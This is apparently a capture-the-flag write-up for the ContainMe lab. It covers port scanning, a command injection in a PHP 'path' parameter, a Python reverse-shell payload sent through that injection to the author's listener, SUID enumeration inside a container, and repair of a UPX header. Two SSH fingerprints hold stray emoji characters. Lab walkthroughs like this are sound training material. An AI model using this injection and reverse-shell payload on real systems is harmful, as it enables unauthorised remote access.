Recon to foothold
We’ll start with a comprehensive scan
rob:ContainMe/ $ sudo masscan -p1-65535,U:1-65535 10.10.235.206 --rate=1000 -e tun0
[sudo] password for rob:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-11-19 14:32:46 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 2222/tcp on 10.10.235.206
Discovered open port 8022/tcp on 10.10.235.206
Discovered open port 22/tcp on 10.10.235.206
Discovered open port 80/tcp on 10.10.235.206
And now an nmap for the found ports
rob:ContainMe/ $ nmap -A -T4 -v -p22,80,2222,8022 10.10.235.206
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-19 14:38 GMT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating Ping Scan at 14:38
Scanning 10.10.235.206 [2 ports]
Completed Ping Scan at 14:38, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:38
Completed Parallel DNS resolution of 1 host. at 14:38, 0.01s elapsed
Initiating Connect Scan at 14:38
Scanning 10.10.235.206 [4 ports]
Discovered open port 22/tcp on 10.10.235.206
Discovered open port 80/tcp on 10.10.235.206
Discovered open port 8022/tcp on 10.10.235.206
Discovered open port 2222/tcp on 10.10.235.206
Completed Connect Scan at 14:38, 0.01s elapsed (4 total ports)
Initiating Service scan at 14:38
Scanning 4 services on 10.10.235.206
Completed Service scan at 14:41, 156.47s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.235.206.
Initiating NSE at 14:41
Completed NSE at 14:41, 30.03s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 1.03s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Nmap scan report for 10.10.235.206
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:3e:80:d9:b0:98:fd:7e:09:6d:34:12:f9:15:8a:18 (RSA)
| 256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_ 256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:ae:ea:27:3f🆎10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
| 256 67:29:75:04:74:1b:83:d3:c8🇩🇪6d:65:fe:e6:07:35 (ECDSA)
|_ 256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.94 seconds
On port 80 we find the default apache2 page
On ports 22 and 8022 we seem to find genuine SSH servers
rob:ContainMe/ $ ssh -p 8022 root@10.10.235.206
The authenticity of host '[10.10.235.206]:8022 ([10.10.235.206]:8022)' can't be established.
ED25519 key fingerprint is SHA256:ukl7DOiM0F0+ttWzSZTK9gOkWtTtzs468ihfBUcib7A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.235.206]:8022' (ED25519) to the list of known hosts.
root@10.10.235.206's password:
Permission denied, please try again.
root@10.10.235.206's password:
And on port 2222 we find … nothing?
rob:ContainMe/ $ nc 10.10.235.206 2222
asdfedsafaswe
dsdsd
On port 8022 we find an interesting SSH version running, haven’t seen ‘obfuscated’ in a banner before
rob:ContainMe/ $ nc 10.10.235.206 8022
SSH-2.0-OpenSSH_7.7p1 Ubuntu-4ppa1+obfuscated
Protocol mismatch.
On the other hand port 22 seems pretty standard, albeit on version 7.6p1 which could allow username enumeration
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Let’s look closer at the web server on port 80, a little dirbusting to begin
rob:ContainMe/ $ dirsearch --url http://10.10.235.206/
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10831
Error Log: /opt/dirsearch/logs/errors-21-11-19_15-32-24.log
Target: http://10.10.235.206/
Output File: /opt/dirsearch/reports/10.10.235.206/_21-11-19_15-32-24.txt
[15:32:24] Starting:
[15:32:25] 403 - 278B - /.ht_wsr.txt
--snip--
[15:32:33] 200 - 11KB - /index.html
[15:32:33] 200 - 329B - /index.php
[15:32:33] 200 - 329B - /index.php/login/
[15:32:33] 200 - 69KB - /info.php
Task Completed
Ok, so we have a few files there, the /index.html that gives us the default view, let’s check out the others
/info.php gives us a PHPinfo page
And /index.php seems to give us a directory listing
However, when we look at the source code for the page we find a comment
<html>
<body>
<pre>
total 28K
drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
-rw-r--r-- 1 root root 11K Jul 15 17:11 index.html
-rw-r--r-- 1 root root 154 Jul 16 11:40 index.php
-rw-r--r-- 1 root root 20 Jul 15 17:27 info.php
<pre>
<!-- where is the path ? -->
</body>
</html>
Perhaps the /index.php file can take a parameter?
Ok, yes it can!
It looks like the parameter we send is basically being passed to ls -la. Can we maybe inject additional commands? && doesn’t work, nor does ||, but ; gives us a result
We can try to inject a reverse shell then. We send our favourite python3 reverse shell
?path=/;export%20RHOST=%2210.14.6.26%22;export RHOST="10.14.6.26";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
And we pop a shell!
rob:ContainMe/ $ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.14.6.26] from (UNKNOWN) [10.10.232.54] 44320
www-data@host1:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
User www-data
After [[stablizing our shell]] we can start some manual enumeration. We can see from the minimal process list, apart from anything else, that we are in a container, so presumably our way forward is to escape
Checking SUID/SGID files we find something interesting
www-data@host1:/$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -la {} \; 2> /dev/null
-rwsr-xr-x 1 root root 358668 Jul 30 04:40 /usr/share/man/zh_TW/crypt
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 39352 Nov 15 2017 /usr/bin/crontab
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
--snip--
That’s an odd place for an executable to be hiding out. We can find another non-SUID version of this file in /home/mike
www-data@host1:/home/mike$ ls -lA
total 376
lrwxrwxrwx 1 root mike 9 Jul 19 15:06 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mike mike 3771 Apr 4 2018 .bashrc
drwx------ 2 mike mike 4096 Jul 30 04:36 .cache
drwx------ 3 mike mike 4096 Jul 30 04:36 .gnupg
-rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile
drwx------ 2 mike mike 4096 Jul 19 15:27 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx
Let’s [[exfil]] this file and have a look at it in ghidra. First we can see that the file is packed with UPX
rob:ContainMe/ $ strings 1cryptupx
--snip--
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.96 Copyright (C) 1996-2020 the UPX Team. All Rights Reserved. $
--snip--
Let’s try to unpack this first before we analyze it
rob:ContainMe/ $ upx -d 1cryptupx -o 1crypt
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: 1cryptupx: CantUnpackException: bad e_phoff
Unpacked 1 file: 0 ok, 1 error.
To reconstruct the UPX header
55 50 58 21 .byte 85,80,88,33 // 0 UPX_MAGIC_LE32
84 09 0D 16 .byte 161,216,208,213 // UPX_MAGIC2_LE32
00 00 00 00 .long 0 // 8 uncompressed adler32
D0 A9 0D 00 .long 0 // 12 compressed adler32
D0 A9 0D 00 .long 0 // 16 uncompressed len
00 02 00 00 .long 0 // 20 compressed len
A7 00 00 00 .long 0 // 24 original file size
08 .byte 0 // 28 filter id
00 .byte 0 // 29 filter cto
00 .byte 0 // unused
00 .byte 45 // 31 header checksum
// From ../p_unix.h
struct b_info { // 12-byte header before each compressed block
uint32_t sz_unc; // uncompressed_size
uint32_t sz_cpr; // compressed_size
unsigned char b_method; // compression algorithm
unsigned char b_ftid; // filter id
unsigned char b_cto8; // filter parameter
unsigned char b_unused;
};
struct l_info // 12-byte trailer in header for loader (offset 116)
{
uint32_t l_checksum;
uint32_t l_magic;
uint16_t l_lsize;
uint8_t l_version;
uint8_t l_format;
};
struct p_info // 12-byte packed program header follows stub loader
{
uint32_t p_progid;
uint32_t p_filesize;
uint32_t p_blocksize;
};
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 10 00 00 00 00 00 00 00 F8 3E 38 8A 55 50 58 21 .........>8.UPX!
000000F0 84 09 0D 16 00 00 00 00 D0 A9 0D 00 D0 A9 0D 00 ................
00000100 00 02 00 00 A7 00 00 00 08 00 00 00 BB FB 20 FF .............. .
00000110 7F 45 4C 46 02 01 01 00 02 00 3E 00 1B 70 1C 40 .ELF......>..p.@
00000120 1F EF 36 F6 ED 40 2F 90 A3 0D 47 26 38 00 08 0A ..6..@/...G&8...
00000130 19 0F 36 B0 DF 00 18 57 04 00 01 40 0F 88 04 5A ..6....W...@...Z
00000140 97 3D 90 00 00 10 0D 6F 05 1F 03 F9 40 DA 0E 40 .=.....o....@..@
00000150 29 32 09 60 6F 5F 60 6F 95 50 2F 50 49 0F 6F 60 )2.`o_`o.P/PI.o`
00057190 88 5E 24 10 BA 0C 13 89 EF E8 96 A2 8B FD 6F 68 .^$...........oh
000571A0 0B A4 10 8B 28 14 B6 75 15 81 FE 55 50 58 21 75 ....(..u...UPX!u
000571B0 11 77 C1 BF B7 5E 7D 00 60 B5 4C EB 04 85 F6 75 .w...^}.`.L....u
000571C0 01 44 5C DB 0D ED FF 39 C6 77 F2 89 C2 48 3B 13 .D\....9.w...H;.
000571D0 77 EB 14 48 70 08 73 6C 92 54 24 68 AF 1D 6C FA w..Hp.sl.T$h..l.
000571E0 8B 7D 58 4C 10 44 A0 18 24 C2 6C 76 DD 2B FE D5 .}XL.D..$.lv.+..
000571F0 A4 C6 BD 48 BE 38 5C 75 B8 F8 F6 7F 13 6E 42 19 ...H.8\u.....nB.
00057200 84 C9 0F 95 C2 31 C0 4D 85 E4 0E C0 85 C2 74 1D .....1.M......t.
00057210 CD DE D0 6E BA FE 00 02 BE 77 4A 39 33 75 0F 46 ...n.....wJ93u.F
00057220 9C 1A 29 78 6D 6B 08 C9 6A 7B 08 88 D4 80 14 BC ..)xmk..j{......
00057230 45 F0 36 B8 E0 45 18 0D 89 F2 6E 04 C6 E8 DB FE E.6..E....n.....
00057240 9B 7D 5A 77 74 54 B7 03 3A 53 D0 48 DC 30 03 E9 .}ZwtT..:S.H.0..
00057250 7F D8 FF 87 14 4B C4 28 5B 5D 41 5C 41 5D C3 2A .....K.([]A\A].*
00057260 96 D1 74 36 0F BF A2 FD 40 F6 C7 01 75 30 5A 0F ..t6....@...u0Z.
000578C0 2F 81 2D 98 86 7F 27 7F 0F A6 DB 54 81 03 AF 97 /.-...'....T....
000578D0 7F F4 FF 92 24 09 8B 00 00 2A 49 FF 00 00 00 00 ....$....*I.....
000578E0 55 50 58 21 00 00 00 00 55 50 58 21 0D 16 08 09 UPX!....UPX!....
000578F0 6E 14 E6 78 C6 22 2C C7 60 07 00 00 42 02 00 00 n..x.",.`...B...
00057900 D0 A9 0D 00 49 1B 00 A2 F4 00 00 00